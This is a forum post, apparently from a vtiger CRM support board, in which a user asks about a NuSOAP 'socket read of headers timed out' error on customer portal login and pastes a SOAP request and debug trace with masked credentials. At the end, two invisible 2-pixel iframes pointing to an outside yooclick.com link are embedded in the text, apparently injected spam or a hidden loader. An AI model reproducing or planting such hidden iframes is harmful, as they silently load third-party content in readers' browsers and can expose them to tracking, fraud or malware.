customer portal HTTP Error: socket read of headers timed out

I got this error when I tried to login customer portal. It is 5.0.3. Has anyone seen this error before? Any help is greatly appreciated.

request
POST /vtigercrmdemo/vtigerservice.php?service=customerportal HTTP/1.0
User-Agent: NuSOAP/0.6.7 (1.1)
Host: <!-- w --><a class="postlink" href="http://www.mydomain.com">www.mydomain.com</a><!-- w -->
Content-Type: text/xml; charset=ISO-8859-1
SOAPAction: "http://www.mydomain.com/vtigercrmdemo";
Content-Length: 667

<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"; xmlns:si="http://soapinterop.org/xsd"><SOAP-ENV:Body><ns1:authenticate_user xmlns:ns1="http://www.mydomain.com/vtigercrmdemo"><user_name xsi:type="xsd:string">xxxxxxx@yahoo.com</user_name><user_password xsi:type="xsd:string">xxxxxxx</user_password></ns1:authenticate_user></SOAP-ENV:Body></SOAP-ENV:Envelope>
response
debug
soapclient2: call: authenticate_user, Array, <!-- m --><a class="postlink" href="http://www.mydomain.com/vtigercrmdemo">http://www.mydomain.com/vtigercrmdemo</a><!-- m -->, <!-- m --><a class="postlink" href="http://www.mydomain.com/vtigercrmdemo">http://www.mydomain.com/vtigercrmdemo</a><!-- m -->, , rpc, encoded; endpointType:
soapclient2: serializing param array for operation authenticate_user
soapclient2: in serialize_val: <!-- e --><a href="mailto:xxxxxxx@yahoo.com">xxxxxxx@yahoo.com</a><!-- e -->, user_name, , , , , encoded
soapclient2: in serialize_val: xxxxxxx, user_password, , , , , encoded
soapclient2: wrapping RPC request with encoded method element
soapclient2: endpoint: <!-- m --><a class="postlink" href="http://www.mydomain.com/vtigercrmdemo/vtigerservice.php?service=customerportal">http://www.mydomain.com/vtigercrmdemo/v ... omerportal</a><!-- m -->, soapAction: <!-- m --><a class="postlink" href="http://www.mydomain.com/vtigercrmdemo">http://www.mydomain.com/vtigercrmdemo</a><!-- m -->, namespace: <!-- m --><a class="postlink" href="http://www.mydomain.com/vtigercrmdemo">http://www.mydomain.com/vtigercrmdemo</a><!-- m -->, style: rpc, use: encoded
soapclient2: SOAP message length: 667 contents: <?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"; xmlns:si="http://soapinterop.org/xsd"><SOAP-ENV:Body><ns1:authenticate_user xmlns:ns1="http://www.mydomain.com/vtigercrmdemo"><user_name xsi:type="xsd:string">xxxxxxx@yahoo.com</user_name><user_password xsi:type="xsd:string">xxxxxxx</user_password></ns1:authenticate_user></SOAP-ENV:Body></SOAP-ENV:Envelope>
soapclient2: transporting via HTTP
soapclient2: sending message, length: 667
soapclient2: transport debug data...
soap_transport_http: scheme = http
soap_transport_http: host = <!-- w --><a class="postlink" href="http://www.mydomain.com">www.mydomain.com</a><!-- w -->
soap_transport_http: path = /vtigercrmdemo/vtigerservice.php
soap_transport_http: query = service=customerportal
soap_transport_http: entered send() with data of length: 667
soap_transport_http: connect connection_timeout 0, response_timeout 30, scheme http, host <!-- w --><a class="postlink" href="http://www.mydomain.com">www.mydomain.com</a><!-- w -->, port 80
soap_transport_http: calling fsockopen with host <!-- w --><a class="postlink" href="http://www.mydomain.com">www.mydomain.com</a><!-- w -->
soap_transport_http: socket connected
soap_transport_http: wrote data to socket, length = 936
soap_transport_http: read line of 0 bytes:
soap_transport_http: socket read of headers timed out after length 0
soap_transport_http: read before timeout:

soap_transport_http: end of send()

soapclient2: Error: HTTP Error: socket read of headers timed out
Constructor error
HTTP Error: socket read of headers timed out <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Sign In or Register to comment.